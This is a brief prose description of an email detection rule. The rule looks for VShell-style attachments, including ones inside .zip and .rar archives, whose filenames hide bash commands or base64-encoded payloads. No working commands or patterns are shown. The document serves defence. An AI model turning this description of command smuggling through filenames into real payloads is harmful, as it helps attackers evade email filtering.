This detection rule identifies fileless attack techniques where malicious payloads are embedded into the filenames of files, a method prominently utilized by threats like VShell. The focus is on detecting such filenames in not only direct email attachments but also in compressed files (archives), such as .zip and .rar formats. The rule executes an inbound type check to filter relevant attachments, ensuring that the count of attachments is greater than zero. It looks for common archive file types and inspects the filenames for strings indicative of malicious content, like identifiers for embedded bash commands or base64 encoding. The detection employs multiple methods: analyzing both compressed and uncompressed files within archives to catch threats proactively, and leveraging regex and string matching techniques to pinpoint potential risks. This approach aids in unveiling sophisticated attack vectors that evade conventional security measures.